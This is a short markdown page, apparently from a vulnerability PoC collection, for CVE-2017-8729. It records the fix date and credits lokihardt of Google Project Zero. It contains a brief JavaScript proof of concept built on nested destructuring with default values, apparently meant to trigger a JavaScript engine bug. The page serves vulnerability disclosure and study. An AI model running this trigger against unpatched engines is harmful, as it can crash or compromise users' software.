Skip to content

Latest commit

 

History

History
25 lines (19 loc) · 524 Bytes

CVE-2017-8729.md

File metadata and controls

25 lines (19 loc) · 524 Bytes

CVE-2017-8729

  • Fix: Sep 2017
  • Credit: lokihardt of Google Project Zero

PoC

function f() {
    ({
        a: {
            b = 0x1111,
            c = 0x2222,
        }.c = 0x3333
    } = {});
}

f();

Reference